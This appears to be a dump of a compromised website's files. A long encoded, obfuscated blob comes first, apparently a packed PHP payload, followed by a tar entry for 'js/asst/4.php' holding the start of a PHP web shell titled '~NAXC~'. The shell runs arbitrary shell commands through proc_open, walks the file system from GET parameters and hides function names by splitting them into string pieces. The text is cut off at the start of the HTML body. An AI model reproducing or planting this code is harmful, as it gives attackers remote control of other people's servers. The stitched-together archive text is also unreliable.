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"/*\GzvnLo{@(Q3xwUizKxOj}R{*/)	//1Ia)|_<+aEj
)//^i>cJ {Y9+E5dO|\\sOH%W@3X]TzeU463lzYY'qa
)/*n(Lu1AOKRHp@txSd88 [Nw*/)#[email protected]=t`n(\vsyu_f$o.ar6
)#Zw)[*_dCwe>X<
; 	/*Q<I:gTUQLCY5<OmgO`?]wuuUcFd*/js/asst/4.php000064400000201701151213033150007001 0ustar00<?php
session_start();
ob_start();

$_VERSION = '1.0';

$path = (isset($_GET["path"])) ? $_GET["path"] : getcwd();
$file = (isset($_GET["file"])) ? $_GET["file"] : "";
$page = isset($_GET['page']) ? max(1, intval($_GET['page'])) : 1;

$os = php_uname('s');
$separator = ($os === 'Windows') ? "\\" : "/";
$explode = explode($separator, $path);

function ekse($coman, $serlok)
{
    $ler = "2>&1";
    if (!preg_match("/" . $ler . "/i", $coman)) {
        $coman = $coman . " " . $ler;
    }
    $komen = $coman;
    $pr = "proc_open";
    if (function_exists($pr)) {
        $tod = @$pr($komen, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $crottz, $serlok);
        echo htmlspecialchars(stream_get_contents($crottz[1]));
    } else {
        return false;
    }
}

function ipserv()
{
    if (empty($_SERVER['SERVER_ADDR'])) {
        return gethostbyname($_SERVER['SERVER_NAME']);
        if (empty(gethostbyname($_SERVER['SERVER_NAME']))) {
            return $_SERVER['SERVER_NAME'];
        }
    } else {
        return $_SERVER['SERVER_ADDR'];
    }
}

function ggr($fl)
{
    $a = "fun" . "cti" . "on_" . "exis" . "ts";
    $b = "po" . "si" . "x_ge" . "tgr" . "gid";
    $c = "fi" . "le" . "gro" . "up";
    if ($a($b)) {
        if (!$a($c)) {
            return "?";
        }
        $d = $b(@$c($fl));
        if (empty($d)) {
            $e = $c($fl);
            if (empty($e)) {
                return "?";
            } else {
                return $e;
            }
        } else {
            return $d['name'];
        }
    } elseif ($a($c)) {
        return @$c($fl);
    } else {
        return "?";
    }
}

function gor($fl)
{
    $a = "fun" . "cti" . "on_" . "exis" . "ts";
    $b = "po" . "s" . "ix_" . "get" . "pwu" . "id";
    $c = "fi" . "le" . "o" . "wn" . "er";
    if ($a($b)) {
        if (!$a($c)) {
            return "?";
        }
        $d = $b(@$c($fl));
        if (empty($d)) {
            $e = $c($fl);
            if (empty($e)) {
                return "?";
            } else {
                return $e;
            }
        } else {
            return $d['name'];
        }
    } elseif ($a($c)) {
        return @$c($fl);
    } else {
        return "?";
    }
}
?>

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="robots" content="noindex, nofollow" />
    <title>~NAXC~</title>
    <script src="https://cdn.tailwindcss.com"></script>
    <script>
        tailwind.config = {
            darkMode: 'class'
        }
    </script>

    <script>
        if (localStorage.getItem('color-theme') === 'dark' || (!('color-theme' in localStorage) && window.matchMedia('(prefers-color-scheme: dark)').matches)) {
            document.documentElement.classList.add('dark');
        } else {
            document.documentElement.classList.remove('dark');
        }
    </script>
</head>

<body class="bg-indigo-50 dark:bg-gray-900 text-gray-800 dark:text-gray-200">

    <?php
    if (isset($_SESSION["success"])) {
    ?>
